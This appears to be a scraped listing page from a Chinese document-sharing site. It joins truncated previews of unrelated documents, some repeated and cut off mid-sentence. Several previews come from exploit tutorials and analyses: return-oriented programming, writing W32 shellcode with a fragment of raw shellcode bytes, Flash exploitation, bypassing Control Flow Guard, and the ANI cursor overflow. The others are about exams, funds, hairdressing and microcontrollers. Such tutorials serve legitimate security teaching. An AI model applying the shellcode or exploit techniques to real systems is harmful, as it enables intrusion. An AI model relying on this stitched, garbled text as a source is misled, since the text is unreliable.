返回导向编程 (ROP) 译者 :Netfairty 前言 欢迎来到第七部分, 经过前面的学习, 可能你想做一些更有挑战性的事. 好的, 本节我们将 要学习的是 ROP( 返回导向编程 ). 不像前一节我们把参数精心布置在堆栈然后调用 Windwos API 去执行它们. 所有介绍 ROP 教程都需

返回导向编程 (ROP) 译者 :Netfairty 前言 欢迎来到第七部分, 经过前面的学习, 可能你想做一些更有挑战性的事. 好的, 本节我们将 要学习的是 ROP( 返回导向编程 ). 不像前一节我们把参数精心布置在堆栈然后调用 Windwos API 去执行它们. 所有介绍 ROP 教程都需 返回导向编程 (ROP) 译者 :Netfairty 前言 欢迎来到第七部分, 经过前面的学习, 可能你想做一些更有挑战性的事. 好的, 本节我们将 要学习的是 ROP( 返回导向编程 ). 不像前一节我们把参数精心布置在堆栈然后调用 Windwos API 去执行它们. 所有介绍 ROP 教程都需要你做很多的工作才能掌握它. 但是在次提醒本教 程不会覆盖 ROP 所有细节. 如果你想更好的理解 ROP

More information

Practice_Leaflet_Chinese_Simplified.indd

Practice_Leaflet_Chinese_Simplified.indd 麦 格 理 专 业 评 定 练 习 册 语 文 数 字 抽 象 推 理 个 性 问 卷 为 什 么 要 运 用 心 理 测 量 学 评 定 用 人 单 位 越 来 越 多 地 在 人 员 选 择 和 提 拔 中 运 用 心 理 测 量 学 评 定 有 力 证 据 证 明, 正 确 运 用 评 定 和 问 卷 能 够 为 评 价 员 工 的 岗 位 胜 任 度 和 满 意 度 提 供 客 观 可 靠

More information

Microsoft Word - 2CA13內文.doc

Microsoft Word - 2CA13內文.doc 006 公 民 - 歷 屆 試 題 全 解 答 案 是 完 全 正 確 的? : 能 源 使 用 愈 多, 除 了 帶 來 經 濟 成 長 外, 相 對 的, 也 會 帶 來 負 面 的 環 保 問 題 我 們 在 發 展 經 濟 的 過 程 中, 若 不 能 兼 顧 環 境 資 源 的 保 育, 將 賠 上 後 代 子 孫 的 生 存 環 境, 這 是 下 列 那 一 種 理 念? 比 較 利 益

More information

"\x33\x31\x43\x17\x83\xeb\xfc\x03\x6b\x0c\xa6\x2b\x97\xda\xaf" "\xd4\x67\x1b\xd0\x5d\x82\x2a\xc2\x3a\xc7\x1f\xd2\x49\x85\x93" "\x99\x1c\x3d\x27\xef\x8

\x33\x31\x43\x17\x83\xeb\xfc\x03\x6b\x0c\xa6\x2b\x97\xda\xaf \xd4\x67\x1b\xd0\x5d\x82\x2a\xc2\x3a\xc7\x1f\xd2\x49\x85\x93 \x99\x1c\x3d\x27\xef\x8 Writing W32 shellcode 译者 :Netfairy 前言 欢迎继续! 以前我们都是用现成的 shellcode, 今天我们将从头开始写我们自己的 shellcode. 这是一个十分有用的练习, 两个原因 : (1) 如果有一个漏洞有严重的空间限制 (2) 理解 ROP( 返回导向编程 ) 的好办法 为了加快速度我决定使用第一部分为 "FreeFloat FTP" 写的漏洞利用框架.

More information

Flash Exploit

Flash Exploit Nanika naninb@gmail.com 魔術 薩斯頓三原則 表演之前絕對不透漏接下來的表演內容 不在同一時間 地點對相同的觀眾變同樣的表演 2 次以上 表演過後, 絕不向觀眾透露表演的秘密 Windows 防護弱點機制 /GS SafeSEH DEP ASLR 突破 破解魔術手法 一般弱點利用 Fish 應用範圍 成功魔術的需求 手法 ( 弱點利用 ) Why Spraying Not control

More information

PC Assembly Language

PC Assembly Language PC Paul A. Carter : 2007 3 4 Copyright c 2001, 2002, 2003, 2004 by Paul Carter ( ) i 1 1 1.1................................ 1 1.1.1........................... 1 1.1.2........................... 1 1.1.3.........................

More information

正式版

正式版 VMSweeper 分析 一. 基本使用 最近, 有一位牛人发布了一个比较有意思的插件, 我们一起看一下其中一些好玩的东西 既然有大牛放血, 那我就顺便给没有追踪 VM 的同学扫扫盲 ( 本文对应插件更新至 VMSweeper1.4 beta 8) 由于我并没有源码, 很多东西都是靠猜了, 如果有什么地方说的不对, 请各位多多指教 这个插件的下载地址是 http://forum.exetools.com/showthread.php?t=13084

More information

40. (4) 肌 肉 收 縮 所 需 的 能 量 乃 直 接 來 自 1 鉀 酸 2 肝 醣 3 乳 酸 4 腺 嘌 呤 核 甘 三 磷 酸 41. (3) 肌 肉 疲 勞 是 1 鹽 酸 2 磷 酸 3 乳 酸 4 脂 肪 酸 儲 存 的 結 果 42. (3) 1 內 臟 肌 2 骨 骼 肌

40. (4) 肌 肉 收 縮 所 需 的 能 量 乃 直 接 來 自 1 鉀 酸 2 肝 醣 3 乳 酸 4 腺 嘌 呤 核 甘 三 磷 酸 41. (3) 肌 肉 疲 勞 是 1 鹽 酸 2 磷 酸 3 乳 酸 4 脂 肪 酸 儲 存 的 結 果 42. (3) 1 內 臟 肌 2 骨 骼 肌 06700 女 子 美 髮 丙 級 工 作 項 目 01: 人 體 生 理 1. (2) 香 菸 煙 霧 中 的 有 害 致 癌 物 是 1 菸 灰 2 焦 油 3 二 氧 化 碳 4 二 氧 化 硫 2. (2) 過 濾 空 氣 中 的 小 塵 埃 是 1 粗 鼻 毛 2 纖 毛 3 鼻 黏 膜 4 微 血 管 3. (4) 以 下 不 屬 於 生 命 特 質 的 是 1 遺 傳 基 因 2 成

More information

招商核心价值混合型证券投资基金托管协议.doc

招商核心价值混合型证券投资基金托管协议.doc 基 金 管 理 人 : 招 商 基 金 管 理 有 限 公 司 基 金 托 管 人 : 中 国 工 商 银 行 股 份 有 限 公 司 二 〇 〇 七 年 三 月 目 录 一 基 金 当 事 人...1 二 基 金 的 依 据 目 的 和 原 则...2 三 基 金 托 管 人 对 基 金 管 理 人 的 业 务 监 督 和 核 查...2 四 基 金 管 理 人 对 基 金 托 管 人 的 业 务

More information

1 1 2 3 4 7 9 12 14 17 17 21 27 30 34 37 40 48 57 69 69 76 85

1 1 2 3 4 7 9 12 14 17 17 21 27 30 34 37 40 48 57 69 69 76 85 1 1 2 3 4 7 9 12 14 17 17 21 27 30 34 37 40 48 57 69 69 76 85 94 99 105 110 119 119 141 ,,,,,,,,,,,,,,,,,,,,,,,, ;, ;,, ,,,,,,,,,,,,,, 1. 2.,, 3., 4.,,,,,,, ( ),, ,,,,,,,,,,,,, 1., :,,, 2.,,,,,,,, 3.,

More information

目 录

目 录 1 Quick51...1 1.1 SmartSOPC Quick51...1 1.2 Quick51...1 1.3 Quick51...2 2 Keil C51 Quick51...4 2.1 Keil C51...4 2.2 Keil C51...4 2.3 1 Keil C51...4 2.4 Flash Magic...9 2.5 ISP...9 2.6...10 2.7 Keil C51...12

More information

第壹拾篇

第壹拾篇 - 目 次 - 目 次 表 目 次... 1 圖 目 次... 1 凡 例... 1 本 鎮 宗 教 禮 俗 篇 大 事 記... 1 緒 論... 1 第 一 章 宗 教 亯 伖... 3 第 一 節 傳 統 民 間 宗 教... 3 第 二 節 天 主 教 與 基 督 教... 31 第 三 節 日 本 神 社... 35 第 二 章 風 俗 習 慣... 38 第 一 節 歲 時 禮 俗...

More information

Ps22Pdf

Ps22Pdf ( ) ( 150 ) 25 15 20 40 ( 25, 1, 25 ), 1. A. B. C. D. 2. A. B. C. D. 3., J = 1 H = 1 ( A B, J', J, H ) A. A = B = 1, J' =0 B. A = B = J' =1 C. A = J' =1, B =0 D. B = J' = 1, A = 0 4. AB + AB A. AB B. AB

More information

《人员招聘与任用》

《人员招聘与任用》 人 员 招 聘 与 任 用 课 程 整 体 教 学 设 计 ( 03~ 04 学 年 第 一 学 期 ) 课 程 名 称 : 人 员 招 聘 与 任 用 所 属 系 部 : 管 理 系 制 定 人 : 合 作 人 : 王 舜 华 张 桂 清 张 俊 娜 制 定 时 间 : 03 年 0 月 河 北 政 法 职 业 学 院 课 程 整 体 教 学 设 计 一 课 程 基 本 信 息 课 程 名 称 :

More information

学位中心〔2015〕 号

学位中心〔2015〕 号 中 外 合 作 办 学 项 目 自 评 报 告 项 目 名 称 : 中 国 矿 业 大 学 与 澳 大 利 亚 格 里 菲 斯 大 学 合 作 举 办 土 木 工 程 专 业 本 科 教 育 项 目 办 学 单 位 : 中 国 矿 业 大 学 一 办 学 基 本 情 况 1. 办 学 单 位 基 本 情 况 中 国 矿 业 大 学 是 教 育 部 直 属 全 国 重 点 大 学, 是 国 家 "211

More information

革 的 实 施 意 见 ( 国 办 发 2015 36 号 ) 3. 广 西 壮 族 自 治 区 人 民 政 府 办 公 厅 关 于 实 施 广 西 高 等 教 育 强 基 创 优 计 划 推 进 高 等 学 校 创 新 创 业 教 育 改 革 的 通 知 ( 桂 政 办 发 2015 49 号 )

革 的 实 施 意 见 ( 国 办 发 2015 36 号 ) 3. 广 西 壮 族 自 治 区 人 民 政 府 办 公 厅 关 于 实 施 广 西 高 等 教 育 强 基 创 优 计 划 推 进 高 等 学 校 创 新 创 业 教 育 改 革 的 通 知 ( 桂 政 办 发 2015 49 号 ) 广 西 壮 族 自 治 区 教 育 厅 桂 教 办 2015 591 号 关 于 征 求 进 一 步 落 实 深 化 高 等 学 校 创 新 创 业 教 育 改 革 具 体 政 策 措 施 意 见 的 通 知 各 高 等 学 校 : 根 据 国 务 院 办 公 厅 关 于 深 化 高 等 学 校 创 新 创 业 教 育 改 革 的 实 施 意 见 ( 国 办 发 2015 36 号 ), 以 及 广

More information

11.doc

11.doc - 1-201311 2013 2012 - 2-1000 300500 2012 2012 400 2012 Word 2013410 123 7780148 375324520@qq.com 2013 2013314-3 - - 4 - - 5 - - 6 - - 7 - - 8 - - 9 - - 10 - - 11 - - 12 - - 13 - - 14 - - 15 - - 16 - -

More information

見 習 單 位 : 台 南 市 佳 里 區 衛 生 所 指 導 醫 師 : 吳 政 達 見 習 日 期 :6/23~6/27,6/29 見 習 組 員 姓 名 ( 學 號 ): 莊 維 倫 (400510489) 一 前 言 佳 里 衛 生 所 簡 介 成 立 於 民 國 四 十 年 二 月 二 十

見 習 單 位 : 台 南 市 佳 里 區 衛 生 所 指 導 醫 師 : 吳 政 達 見 習 日 期 :6/23~6/27,6/29 見 習 組 員 姓 名 ( 學 號 ): 莊 維 倫 (400510489) 一 前 言 佳 里 衛 生 所 簡 介 成 立 於 民 國 四 十 年 二 月 二 十 衛生所服務學習 見 習 單 位 : 台 南 市 佳 里 區 衛 生 所 指 導 醫 師 : 吳 政 達 見 習 日 期 :6/23~6/27,6/29 見 習 組 員 姓 名 ( 學 號 ): 莊 維 倫 (400510489) 一 前 言 佳 里 衛 生 所 簡 介 成 立 於 民 國 四 十 年 二 月 二 十 七 日, 本 來 隸 屬 鎮 公 所, 後 來 經 過 幾 次 變 動, 現 隸 屬

More information

MSP430 MSP430 F149 MSP430F149 P USART MSP430F PWM 63#

MSP430 MSP430 F149 MSP430F149 P USART MSP430F PWM 63# MSP430 MSP430 0002 63# 710061 2003 7 63# 710061 1 MSP430 MSP430 F149 MSP430F149 P USART MSP430F149 485 232 PWM 63# 710061 2 MSP430 MSP430 16 FLASH,, 16, 64K,, 16 14 12 6 P USART DCO, 8M FLASH,, JTAG FET(FLASH

More information

营销系实验大纲.doc

营销系实验大纲.doc 目 录 市 场 营 销 课 程 设 计...2 市 场 调 查 与 预 测 课 程 设 计...2 暑 期 专 题 调 研...4 营 销 管 理 模 拟 实 验...5 消 费 者 行 为 学 课 程 设 计...8 专 业 实 习...10 广 告 学 课 程 设 计...12 现 代 服 务 业 营 销 策 划 课 程 设 计...13 零 售 管 理 课 程 设 计...14 毕 业 实 习...16

More information

Microsoft Word - powerpc_figure_0408.doc

Microsoft Word - powerpc_figure_0408.doc PowerPC Figure PPC 入 门 与 优 化 By Skywind(2007) http://www.joynb.net/blog/ 背 景 介 绍 PowerPC 于 1991 年 IBM/MOTO/APPLE 研 制, 大 量 应 用 于 服 务 器 (AIX / AS400 系 列 及 苹 果 系 列 服 务 器 ), 家 用 游 戏 机 (PS3, Wii, XBOX, GameCube),

More information

一、单项共29题,每小题2分,共58分.

一、单项共29题,每小题2分,共58分. 2015 年 下 半 年 幼 儿 教 师 资 格 证 考 试 综 合 素 质 真 题 及 答 案 一 单 项 共 29 题, 每 小 题 2 分, 共 58 分. 在 每 小 题 列 出 的 四 个 备 选 项 中 只 有 一 个 是 符 合 题 目 要 求 的, 请 用 2B 铅 笔 把 答 题 卡 上 对 应 题 目 的 答 案 字 母 按 要 求 凃 黒 错 选. 多 选 或 未 选 均 无

More information

件 驱 动 属 短 线 操 作, 操 作 风 险 相 对 较 大, 建 议 快 进 快 出, 不 可 恋 战! 昨 日 盘 面 中 表 现 活 跃 的 品 种 多 为 低 价 股, 钢 铁 煤 炭 成 为 涨 幅 居 前 的 品 种, 有 以 下 几 点 值 得 关 注 : 首 先 从 行 业 看,

件 驱 动 属 短 线 操 作, 操 作 风 险 相 对 较 大, 建 议 快 进 快 出, 不 可 恋 战! 昨 日 盘 面 中 表 现 活 跃 的 品 种 多 为 低 价 股, 钢 铁 煤 炭 成 为 涨 幅 居 前 的 品 种, 有 以 下 几 点 值 得 关 注 : 首 先 从 行 业 看, 2016 年 01 月 07 日 一 风 行 视 点 1. 市 场 研 判 昨 日 盘 面 中 热 点 转 换 非 常 明 显 滞 涨 低 价 成 为 资 金 短 期 追 逐 重 点 市 场 风 格 的 转 换 说 明 资 金 偏 于 谨 慎, 同 时 热 点 的 快 速 轮 动 也 说 明 反 弹 以 存 量 资 金 为 主 预 计 短 期 市 场 仍 将 缺 乏 赚 钱 效 应, 投 资 者 应

More information

微型计算机原理及应用试题 机电96

微型计算机原理及应用试题   机电96 微 机 原 理 试 题 ( 一 ) 总 分 : 一 : 单 项 选 择 题 ( 每 题 1 分, 共 10 分 ) 1. 微 型 计 算 机 中 主 要 包 括 有 ( ) A) 微 处 理 器 存 储 器 和 I/O 接 口 B) 微 处 理 器 运 算 器 和 存 储 器 C) 控 制 器 运 算 器 和 寄 存 器 组 D) 微 处 理 器 运 算 器 和 寄 存 器 2. DMA 控 制 器

More information

2. 过程 这里主要使用 gdb 来拆炸弹 当然, 用其他工具来辅助, 应该可以更高效地完成 (gdb) echo ======================= Defuse Phase_1 ==============================\n\n ==================

2. 过程 这里主要使用 gdb 来拆炸弹 当然, 用其他工具来辅助, 应该可以更高效地完成 (gdb) echo ======================= Defuse Phase_1 ==============================\n\n ================== CMU 计算机课程 Bomb Lab 拆除过程解析 Yungang Bao(baoyungang@gmail.com) 2011/10/15 CMU 的计算机系统课程 Lab 有一个是拆炸弹 : 给一个二进制 炸弹 可执行文件, 要猜对 6 条输入才不会引爆, 既有挑战又有趣味 感兴趣的朋友可以尝试一下. CMU 课程网址 :http://csapp.cs.cmu.edu/public/labs.html

More information

1 重 要 提 示 基 金 管 理 人 的 董 事 会 及 董 事 保 证 本 报 告 所 载 资 料 不 存 在 虚 假 记 载 误 导 性 陈 述 或 重 大 遗 漏, 并 对 其 内 容 的 真 实 性 准 确 性 和 完 整 性 承 担 个 别 及 连 带 责 任 基 金 托 管 人 中 国

1 重 要 提 示 基 金 管 理 人 的 董 事 会 及 董 事 保 证 本 报 告 所 载 资 料 不 存 在 虚 假 记 载 误 导 性 陈 述 或 重 大 遗 漏, 并 对 其 内 容 的 真 实 性 准 确 性 和 完 整 性 承 担 个 别 及 连 带 责 任 基 金 托 管 人 中 国 摩 根 士 丹 利 华 鑫 基 础 行 业 证 券 投 资 基 金 2015 年 第 4 季 度 报 告 2015 年 12 月 31 日 基 金 管 理 人 : 摩 根 士 丹 利 华 鑫 基 金 管 理 有 限 公 司 基 金 托 管 人 : 中 国 光 大 银 行 股 份 有 限 公 司 报 告 送 出 日 期 :2016 年 1 月 21 日 1 重 要 提 示 基 金 管 理 人 的 董

More information

Microsoft PowerPoint - C15_LECTURE_NOTE_06

Microsoft PowerPoint - C15_LECTURE_NOTE_06 61 Flag-Control 8088/8086 MICROPROCESSOR PROGRAMMING CONTROL FLOW INSTRUCTIONS AND PROGRAM STRUCTURES LAHF SAHF CLC STC CMC CLI STI Load AH from flags Store AH into flags Clear carry flag Set carry flag

More information

证券代码:002659 证券简称:中泰桥梁 公告编号:2015-035

证券代码:002659         证券简称:中泰桥梁          公告编号:2015-035 证 券 代 码 :603618 证 券 简 称 : 杭 电 股 份 编 号 :2015-028 杭 州 电 缆 股 份 有 限 公 司 上 市 公 司 简 称 : 杭 电 股 份 股 票 代 码 :603618 上 市 地 点 : 上 海 证 券 交 易 所 人 : 永 通 控 股 集 团 有 限 公 司 住 所 地 : 杭 州 市 富 阳 区 东 洲 街 道 江 滨 东 大 道 138 号 通 信

More information

Microsoft PowerPoint - C15_LECTURE_NOTE_05.ppt

Microsoft PowerPoint - C15_LECTURE_NOTE_05.ppt 8088/8086 MICROPROCSOR PROGRAMMING INTEGER INSTRUCTIONS AND COMPUTATIONS The MOVE The move (MOV) instruction is used to transfer a byte or a word of data from a source operand to a destination operand

More information

逢 甲 大 學

逢    甲    大    學 論 車 Auto Vehicle 立老 磊 年 老 立老 了 見 老 了不 料 利 了 識 更了 力量! i 車. 車 利 89c51 來 流. 令. 車 8051 類 車利 車 ii Abstract The goal of this thesis is to design a small auto vehicle by using IC as its control center. Our auto

More information

Microsoft Word - A0011-JRCZ0030-2010招商金融2012_cicc_cmts120130.doc

Microsoft Word - A0011-JRCZ0030-2010招商金融2012_cicc_cmts120130.doc 招 商 银 行 股 份 有 限 公 司 2012 年 第 一 期 金 融 债 信 用 评 级 分 析 报 告 评 级 结 果 : 主 体 长 期 信 用 等 级 AAA 金 融 债 券 信 用 等 级 AAA 评 级 时 间 :2012 年 1 月 30 日 主 要 数 据 : 项 目 2011 年 6 月 2010 年 2009 年 2008 年 资 产 总 额 ( 亿 元 ) 26432.05

More information

Microsoft Word - QQScLauncher逆向分享.docx

Microsoft Word - QQScLauncher逆向分享.docx QQScLauncher 逆向分析 逆向版本 :QQ2011 正式版 (2425) 逆向目的 : 只是感兴趣, 没有任何其他意图版权声明 : 本文档由代码疯子整理, 在保留本文档版权声明和原始出处的前提下欢迎转载! 需要工具 :IDA Pro Ollydbg 正文内容 : 在 QQ 最新版 (QQ2011 正式版 ) 中加入了不少新功能, 如手写 视频群聊 语音输入等, 另外还有一个功能是可以把好友拖放到桌面上,

More information

前沿技术 全面绕过执行流保护 安全研究部张云海 执行流保护 (CFG,Control Flow Guard) 是微软在 Windows 10 技术预览版与 Windows 8.1 update 3 中, 默认启用的一项缓解技术 在分析 CFG 的实现机制的过程中, 我们发现了一种全面绕过 CFG 的

前沿技术 全面绕过执行流保护 安全研究部张云海 执行流保护 (CFG,Control Flow Guard) 是微软在 Windows 10 技术预览版与 Windows 8.1 update 3 中, 默认启用的一项缓解技术 在分析 CFG 的实现机制的过程中, 我们发现了一种全面绕过 CFG 的 全面绕过执行流保护 安全研究部张云海 执行流保护 (CFG,Control Flow Guard) 是微软在 Windows 10 技术预览版与 Windows 8.1 update 3 中, 默认启用的一项缓解技术 在分析 CFG 的实现机制的过程中, 我们发现了一种全面绕过 CFG 的方法, 并配合微软修复了这一问题 背景 FG 是微软在 Windows 10 技术预览 C版与 Windows

More information

untitled

untitled 8086/8088 CIP /. 2004.8 ISBN 7-03-014239-X.... TP313 CIP 2004 086019 16 100717 http://www.sciencep.com * 2004 8 2004 8 1 5 500 787 1092 1/16 16 1/2 391 000 1 2 ii 1 2 CAI CAI 3 To the teacher To the student

More information

寿险分支机构营业场所统计表(0706) .xls

寿险分支机构营业场所统计表(0706) .xls 分 支 机 构 名 称 分 支 机 构 地 址 邮 编 第 一 联 系 电 话 第 二 联 系 电 话 ( 统 一 总 机 ) 中 国 平 安 人 寿 保 险 股 份 有 限 公 司 北 京 分 公 司 北 京 市 西 城 区 金 融 街 23 号 平 安 大 厦 100033 010-59730012 4008866338 中 国 平 安 人 寿 保 险 股 份 有 限 公 司 北 京 分 公 司

More information

instructions.PDF

instructions.PDF 94 SIMATIC (END) (END) Micro/WIN 32 (STOP) (STOP) CPU RUN STOP STOP CPU RUN STOP (WDR) (Watchdog Reset) (WDR) CPU WDR WDR ( ) I/O ( I/O ) SM (SM0 SM5 SM29 ) 25 0 ms 00 ms STOP 300ms 300ms WDR S7-200 CPU

More information

Microsoft PowerPoint - XCon2010_win7_cn.ppt [兼容模式]

Microsoft PowerPoint - XCon2010_win7_cn.ppt [兼容模式] 绕过 windows 7 浏览器内存保护 Chen XiaoBo Xiao_Chen@McAfee.com Xie Jun Jun_Xie@McAfee.com com Windows 保护机制回顾 GS Stack cookies 防止覆盖 EIP 可以通过覆盖 SEH chains 来绕过 /GS 保护 SafeSEH & SEHOP SEH handler 验证 可以通过已注册的 SEH handler

More information

银川一职服装设计与工艺专业教学计划

银川一职服装设计与工艺专业教学计划 银 川 职 业 技 术 学 院 电 子 工 程 部 现 代 物 流 专 业 2013 级 实 施 性 教 学 计 划 ( 专 业 代 码 :121900) 一 招 生 对 象 与 学 制 招 生 对 象 : 应 届 初 中 毕 业 生 学 制 : 全 日 制 3 年 (2+1, 第 五 六 学 期 顶 岗 实 习 ) 采 用 2+1 人 才 培 养 模 式, 即 两 年 在 校 学 习, 第 三 年

More information

Microsoft Word - 新1-4.doc

Microsoft Word - 新1-4.doc 第 4 章 DOS 病毒解析 本章学习目标 DOS 下的病毒都是可以当作范本来学习的 在 DOS 时代, 病毒得到了长足的发展, 其很多相关理论和技术至今都还在应用或影响着现在的病毒开发工作, 有的更是成为了经典的法则被病毒开发者引用和遵循 本章将专门讲述 DOS 系统下两种类型的病毒 : 引导型病毒 文件型病毒, 并配以具体的例子, 旨在向读者讲解最基本的病毒分析和编写技能, 为今后的病毒防治工作打下基础

More information

于是 run, 输入, 果然 :Phase 1 defused. How about the next one? 然后来看 phase2: 08048bb6 <phase_2>: 8048bb6: 55 push %ebp 8048bb7: 89 e5 mov %esp,%ebp 8048bb9:

于是 run, 输入, 果然 :Phase 1 defused. How about the next one? 然后来看 phase2: 08048bb6 <phase_2>: 8048bb6: 55 push %ebp 8048bb7: 89 e5 mov %esp,%ebp 8048bb9: 二进制炸弹实验报告 登录服务器后, 首先运行静态分析工具 OBJDUMP 来获得程序的反汇编版本 bomb.txt, 用 word 打开便可通过汇编代码来分析程序 运行 gdb bomb, 便可以在开始进行动态调试 首先要做的是 break explode_bomb, 即在爆炸函数的的入口设置断点, 这样就可以避免调试过程中各种原因引起的爆炸 首先来看 phase1 的代码 : 08048b90 :

More information

1.5招募说明书(草案)

1.5招募说明书(草案) PUBLIC 2014 2 PUBLIC - 1 2014 2 PUBLIC - 2 2014 2 PUBLIC - 3 2014 2 PUBLIC - 4 2014 2 PUBLIC - 5 2014 2 PUBLIC - 6 2014 2 PUBLIC - 7 2014 2 PUBLIC - 8 2014 2 PUBLIC - 9 2014 2 PUBLIC - 10 2014 2 PUBLIC

More information

Microsoft PowerPoint - C15_LECTURE_NOTE_05.ppt

Microsoft PowerPoint - C15_LECTURE_NOTE_05.ppt 8088/8086 MICROPROCESSOR PROGRAMMING INTEGER INSTRUCTIONS AND COMPUTATIONS 8088/8086 MICROPROCESSOR PROGRAMMING INTEGER INSTRUCTIONS AND COMPUTATIONS 5.1 Data-Transfer Instructions 5.2 Arithmetic Instructions

More information

Microsoft Word - 最新正文.doc

Microsoft Word - 最新正文.doc 9 21 1.1.1 1.1.2 1 2 2 Windows 7+Office 2010 3 4 5 6 4 7 1.1.3 5 1.1.4 1 3 2 NII 1993 3 CNNIC 2014 1 16 33 1 2013 12 6.18 5358 45.8% 2012 3.7 2 2013 12 5 19.1% 2012 74.5% 81.0% 2013 3G 2013 12 2.47 2012

More information

固定收益类投资品种介绍——股市行情低迷时的投资选择

固定收益类投资品种介绍——股市行情低迷时的投资选择 证 券 市 场 的 非 理 性 研 究 分 析 ( 上 交 所 投 资 者 教 育 网 站 ) 郁 金 香 泡 沫 密 西 西 比 泡 沫 南 海 泡 沫, 以 及 最 近 的 美 国 科 网 泡 沫 等 此 类 黑 天 鹅 事 件 并 不 鲜 见, 若 按 照 概 率 学 的 正 态 分 布 来 研 究, 如 此 频 繁 的 暴 涨 暴 跌 是 不 可 能 的, 但 事 实 上 却 发 生 了,

More information

程序 14-9 linux/include/string.h 1 #ifndef _STRING_H_ 2 #define _STRING_H_ 3 4 #ifndef NULL 5 #define NULL ((void *) 0) 6 #endif 7 8 #ifndef _SIZE_T 9 #

程序 14-9 linux/include/string.h 1 #ifndef _STRING_H_ 2 #define _STRING_H_ 3 4 #ifndef NULL 5 #define NULL ((void *) 0) 6 #endif 7 8 #ifndef _SIZE_T 9 # 程序 14-9 linux/include/string.h 1 #ifndef _STRING_H_ 2 #define _STRING_H_ 3 4 #ifndef NULL 5 #define NULL ((void *) 0) 6 #endif 7 8 #ifndef _SIZE_T 9 #define _SIZE_T 10 typedef unsigned int size_t; 11 #endif

More information

东南大学2014年度部门预算

东南大学2014年度部门预算 东 南 大 学 2016 年 部 门 预 算 二 零 一 六 年 五 月 1 目 录 一 学 校 概 况 二 2016 年 部 门 预 算 报 表 ( 一 ) 部 门 收 支 总 表 ( 二 ) 部 门 收 入 总 表 ( 三 ) 部 门 支 出 总 表 ( 四 ) 一 般 公 共 预 算 支 出 表 三 2016 年 部 门 预 算 情 况 说 明 ( 一 ) 部 门 收 支 总 表 说 明 (

More information

第 一 篇 勞 動 契 約 阿 華 最 近 從 事 務 所 出 來 自 己 開 了 一 間 會 計 師 事 務 所, 原 本 想 要 一 個 人 做 就 好, 但 因 應 服 務 之 客 戶 逐 漸 增 加, 需 要 多 請 幾 位 來 幫 忙 處 理 會 計 相 關 之 業 務, 但 不 太 懂

第 一 篇 勞 動 契 約 阿 華 最 近 從 事 務 所 出 來 自 己 開 了 一 間 會 計 師 事 務 所, 原 本 想 要 一 個 人 做 就 好, 但 因 應 服 務 之 客 戶 逐 漸 增 加, 需 要 多 請 幾 位 來 幫 忙 處 理 會 計 相 關 之 業 務, 但 不 太 懂 目 錄 第 一 篇 勞 動 契 約... 2 第 二 篇 工 資... 5 第 三 篇 工 作 時 間... 9 第 四 篇 休 假 例 假 及 請 假... 16 第 五 篇 職 業 災 害 補 償... 22 第 六 篇 勞 資 爭 議 調 解... 24 附 則 一 性 別 工 作 平 等 法 常 見 問 題... 26 附 則 二 僱 用 部 分 時 間 工 作 勞 工 應 行 注 意 事

More information

本次习题课中提到的 课本, 均指机械工业出版社的 Intel 微处理器 ( 原书第八版 ) 中文版, 使用其他版本课本的同学需要自己对应

本次习题课中提到的 课本, 均指机械工业出版社的 Intel 微处理器 ( 原书第八版 ) 中文版, 使用其他版本课本的同学需要自己对应 微机原理习题课 助教 : 王骏腾 本次习题课中提到的 课本, 均指机械工业出版社的 Intel 微处理器 ( 原书第八版 ) 中文版, 使用其他版本课本的同学需要自己对应 习题 33:Core2 处理器可寻址 存储器? 答案 :4GB 64GB 1TB ( 课本 P18 表 1-6) 第一章 习题 53: 信号的作用是什么? 答案 :I/O 读控制, 低电平有效 ( 两点都要答上, 详细可见课本 P20)

More information

untitled

untitled CPU!! 00-11-8 Liping zhang, Tsinghua 1 : ADD(r1, r, r) CMPLEC(r, 5, r0) MUL(r1, r, r) SUB(r1, r, r5) ADD r, ( ) r CMP. CMP r.. t t + 1 t + t + t + t + 5 t + 6 IF( ) ADD CMP MUL SUB RF NOP ADD CMP MUL SUB

More information

动画光标文件(

动画光标文件( Ms07-017 动画光标文件 (.Ani) 漏洞分析 neinei/2007-4-8 一 漏洞描述 : Microsoft Windows 在处理动画光标文件 (.ani) 时没有正确地验证 ANI 头中所指定的大小, 导致栈溢出漏洞 恶意攻击者可以在网页中嵌入相关脚本, 在用户浏览网页时会执行伪造的.ani 文件, 或者用户打开了恶意的邮件消息, 都会触发这个溢出, 导致执行任意代码 该文件 (.ani)

More information

bingdian001.com

bingdian001.com 1. DLL(Dynamic Linkable Library) DLL ± lib EXE DLL DLL EXE EXE ± EXE DLL 1 DLL DLL DLL Windows DLL Windows API Visual Basic Visual C++ Delphi 2 Windows system32 kernel32.dll user32.dll gdi32.dll windows

More information

Microsoft Word - 小論文.doc

Microsoft Word - 小論文.doc 篇 名 : 日 本 皇 室 的 假 面 受 傳 統 價 值 觀 束 縛 的 雅 子 妃 作 者 : 王 怡 文 國 立 台 南 女 中 高 二 17 班 王 喻 柔 國 立 台 南 女 中 高 二 17 班 吳 芷 融 國 立 台 南 女 中 高 二 17 班 指 導 老 師 : 陳 卓 欣 老 師 壹 前 言 一 研 究 動 機 2007 年, 班 希 爾 斯 出 版 雅 子 妃 菊 花 王 朝

More information

<4D6963726F736F667420576F7264202D20D6FDB9DCB9FAC6F3B1A8B1EDB8BDD7A2A3A8BACFB2A2BCB0C4B8B9ABCBBEA3A93D323031302D342D32332E646F63>

<4D6963726F736F667420576F7264202D20D6FDB9DCB9FAC6F3B1A8B1EDB8BDD7A2A3A8BACFB2A2BCB0C4B8B9ABCBBEA3A93D323031302D342D32332E646F63> 中 瑞 岳 华 会 计 师 事 务 所 有 限 公 司 Zhongrui Yuehua Certified Public Accountants Co., Ltd. 电 话 :+86(10)88091188 地 址 : 北 京 市 西 城 区 金 融 大 街 35 号 国 际 企 业 大 厦 A 座 8-9 层 Add:8-9 /F Block A Corporation Bldg.No.35 Finance

More information

組譯與連結(Ver6

組譯與連結(Ver6 Intel 8088/86 CPU GND 1 40 VCC GND 1 40 VCC A14 2 39 A15 AD14 2 39 AD15 A13 3 38 A16/S3 AD13 3 38 A16/S3 A12 4 37 A17/S4 AD12 4 37 A17/S4 A11 5 36 A18/S5 AD11 5 36 A18/S5 A10 A9 6 7 35 34 A19/S6 SS0 (

More information

1 TPIS TPIS 2 2

1 TPIS TPIS 2 2 1 1 TPIS TPIS 2 2 1. 2. 3. 4. 3 3 4 5 4 TPIS TPIS 6 5 350 Mark Coil F3/F6 350 M 150 M 25 M 7.12M 8 M F3 F6 F4 F7 F8 8M AA 7 350 28V 5V IC HCPL2731 0.5mA 6 8 (TPIS) TPIS 9 7 IC AT89C2051 AT89C2051 CMOS8

